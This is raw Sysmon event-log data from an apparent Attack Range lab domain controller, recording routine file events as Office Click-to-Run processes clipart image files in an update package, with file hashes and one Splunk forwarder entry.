Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0238927.WMFMD5=F259FD8B460DA0106624D449731BE51D,SHA256=4EC975F41430FEE6510E213346AC3F4DC343944DC879DE7204A4238C30FC8F0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0238333.WMFMD5=2F7389C4FE1DCFDC2DD2C934508B106A,SHA256=66F99698094581136488B63ABBCCED9A20013EE204C67050AF6E0CDA4B1C4964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0237759.WMFMD5=25B4BA3E5168F0FFF4FF649132B0A180,SHA256=03672D6DEA089A824D868D8AD7E0EC1EFF37011F15AD60305D1C953AD0C7FD0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0237336.WMFMD5=9FA8B6D13DFAC8DFB412D39543909D5B,SHA256=CAC503756AA9E4412F3AEF45C9BC41E29B0D79C34AD5CA7E1A23245372CB0EFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0237228.WMFMD5=6F0E607F3D443418728A8A48E19E35C2,SHA256=1588231DDF05EA47F0327B4A4EB3D1E2A4A5C608D484FEC166C70F76B80AD2DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0237225.WMFMD5=0FC41F59DEE51562A764B82F7705EAAE,SHA256=2DE1ECA568A6EC156DF6EA88697481191153D88B119B6ABB209CFFBBF8E93AE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0234376.WMFMD5=E489920DA805AD8A993BAA476B523AFC,SHA256=DAA5A0A38C49426EED0CFAFDB8195D931BE93270D89C72CCBD5377B3A0BF75B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0234001.WMFMD5=14CAE3F056F2DC4F1FAEBED6DE623182,SHA256=6F2F7C114B2618D851770A044DD3B5DF530571B7F44AC332803529BEF6306479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0234000.WMFMD5=3BF9F750D1DE1745D3A73076BBA14AB2,SHA256=80D0C239C6F4BC1502B4755E19D5CBC87F5B174B46325784FAB97620B0AE9371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0233992.WMFMD5=AD2DA8E673F58FE3C44301D5AFD9062A,SHA256=78A897A72B16C117E47A3C82EB0FC19E311DC030ED2C4C64A33921FCF1064C72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0233665.WMFMD5=8F90C4AD9588FACD43A449FE0F8EF2C5,SHA256=C369891C8FD41ECEB82CFCE01B7DDC358AE47D14ACEB085B4620277AD23D8481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0233512.WMFMD5=720D7E1F77D1D5157B4B103E6C1A1DF9,SHA256=C8FA9F21F4CBAC8A488475480A94842B8FB7867AB7648AA28F82642A6EB9C95A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0232803.WMFMD5=71F33A3150E6E51AE1BCBB52F846FAEC,SHA256=6386D3AA887F83303D79569ABAAAEEE9C4E355799A6AAA0BFBF449E181C78C1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0232797.WMFMD5=2605752AA8CCE9B972D142F163249414,SHA256=B42F16C8445EC377BA0A497AAB7CD8140535850D2D7E6C115270D43224026F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0232795.WMFMD5=128069816D8E74AFAE9BAEC885AE78A5,SHA256=51D2B2500EE6C8F3DF9EB2FBDAD50611DA02B12C8A411F53C1DD242417D92E23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.252{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0232395.WMFMD5=859994ADEF4A7235368197C33808C3DC,SHA256=250A68FDD14CEFE7250B2D70A34C6087E41DC7CEE40CD01E0F0BEBEA84967098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0232393.WMFMD5=D9B3E97FD8EED6303C210B4EBE3A7A68,SHA256=BA7E0ABABA8C762A9E3AD27F9E65CFBD05B8AECD782CC0B2419166F3B016D2DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0232171.WMFMD5=FFC3056CAE8AF6FE5708DA5C84B11492,SHA256=3A5093ACAF1E1724F94DAB8CAEBE7E9B3570FA59F0DBD091E75E6C5AB8E1DD55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0230558.WMFMD5=99EBD0A2296BD66FF71E33F6FF984389,SHA256=7F02E14CE21C06BED3DD3901B5953091CE596DBC63607D37598AE56341184A38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0230553.WMFMD5=88B1F09E9C350E01629E9303DA833117,SHA256=3059DCF53C95CE51BCF576405A581C938BBA05DE36E509D991BBFBED469A409A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0228959.WMFMD5=48D0976DA0BE0C52437A076E997438DF,SHA256=2F58E1FBB56C6EBBC558528270BD332202E1538871EF5CF255988AFC9BF1E343,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0228823.WMFMD5=483D80836E136886AF9DC7EEF7821BA8,SHA256=CC0F437601B1C8CA5E9E07745819D8103966D0EFE2320503138DFDD4A8191F9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0227558.JPGMD5=6E44F6C1D963F21A153A0A07FA431B28,SHA256=4F42B0FA57D6CC6CCC0519ACB80BCC23CB38D7382A90B839141CD2E6D93DE94A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0227419.JPGMD5=B4367D5ACEE7B6D4E14071CA769ECD6C,SHA256=6D3F336A8AC9172C15225614C96A1544B407BD8E627678A582B91C4511999D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF6C664161E718CE070288A0C1148F4E,SHA256=95374D2128143B4A4143F13A8638707BE8453F70002B3720F543C5B77AE06868,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0217872.WMFMD5=63551B393388FF3A8EED84270861F5FE,SHA256=7F6BCA9FCEA30C94E74B4EF042F075211EC016820C335156B873E40C8CE43A2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0217302.WMFMD5=235E1F2AC0DBE2ABB48D20B4544FF0CB,SHA256=B2B70D17404885C7936E4AAE907D901A338DA19A3ED6143835B39647ACC5434D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.236{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0217262.WMFMD5=58EC20BF559D6C8951ECFB1CD35FF342,SHA256=F3C98D63F12F7F087DBAD70CD871B139923AA6F329024040FB13413647850C6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216874.WMFMD5=65AC7C06202926C9497DB6535A28D266,SHA256=6B4F305FA4D76B5AD6B553F083DCB707E60C7847AB94A4A8640830568EF8F4A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216612.WMFMD5=F584DE485032CA182AF0EB6BC01B18A8,SHA256=263B0E35F5F584C70B45B789C644C6AFAB069523028438C4946A6E293035AB2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065993Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216600.WMFMD5=44B220CF02126B4AB565BBEE3626763E,SHA256=DEE48D0C7B9B2C95D9AD7DD6B5B25F255F5C5254C096AC0291F7D2C41D66A1E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065992Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216570.WMFMD5=9DCC7B0462A7EA022C5E6E16B41AD2C4,SHA256=A08D83939168E7DAE8B38225B4695EE840D4AF109A0D9B4447BEFFE2827E1F45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065991Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216540.WMFMD5=7F66128CD6260BF3E4B604375325A117,SHA256=6C8AC26EEC5139EAC1BC9CA3601E0EBAD646F118E13130EC15F90C4944F81202,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065990Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216153.JPGMD5=991C9696D84D8BDE8AE262B653370D06,SHA256=6FADD3F544CCCEE26718B31F6BC16F6B2DDB72072ADC57B13B8459C9279A9DC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065989Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0216112.JPGMD5=6AE87A121608A2F9ED5608688185BC7E,SHA256=56C2D1176CEEBA6A3C25D920B7620CA5C354EDE47412644A5CE7C344D63F6E1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065988Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0215718.WMFMD5=B6BF73EFE7B4998A32DD36519B2BB4AA,SHA256=2C0C0523DA0E6DF9CD96848674195ACC79B0CB437EDBA3225642725F81137395,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0215710.WMFMD5=219CD09378101143D13B586E8BF85C4B,SHA256=36CF12F33FD31F4A0CF0F6F165F452F57B6BD96546B305B898A3C268964DEE63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0215709.WMFMD5=3DB4D0B126265C3EF7096F5109E922CF,SHA256=847548C501322A6A4EA13F3B3C478FB89ADA1EA5D25E3B6E7B70A1105BA9D05F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0215210.WMFMD5=9D0817F9B7AC102D096492F2A9E741CD,SHA256=DDB449D9A994F62B49AD323972C82AC8B896ABCA416C34775EF27B0D6652127A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065984Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0215076.WMFMD5=78A628CE924D83428B9D032537EA6460,SHA256=1F5719B28E85FBEE842199F1D558375A444C11F078D489EEB5C89D23CED233E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065983Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0215070.WMFMD5=5831A1BC569502AB5A05915555C3E6AB,SHA256=ED20E60B03BCD2FCFA20F62B7162E425653FB80E271F31C7D896EF387BCD69E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065982Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0214948.WMFMD5=973FBC27A70E6F53A9FCBB9B07267227,SHA256=2C45F697942EA4ED24FE1E255DB8F663EEDEF6D205F9D0E439740CEB7AC3B8DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065981Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0214934.WMFMD5=93DD008A9FEAE1AB410A9A8341EB957C,SHA256=1B9929B0F614B28D42AE240A2076E0452E6D3B5FFBBE658B2F26EF2144B39A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065980Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0213449.WMFMD5=06CAC393307DF174EF225F1086A364DC,SHA256=129FBC76183C869DD3AE16C1F4202EFA79BC4E593EF7013BA555CC9EE584371E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065979Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0213243.WMFMD5=E05BC3D8F8029025DD34B9927859AA97,SHA256=D14DAC504960462214AFFFB4484BD1236297BB6696FEDC8E1BC2E1779ADDA6B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065978Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.205{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 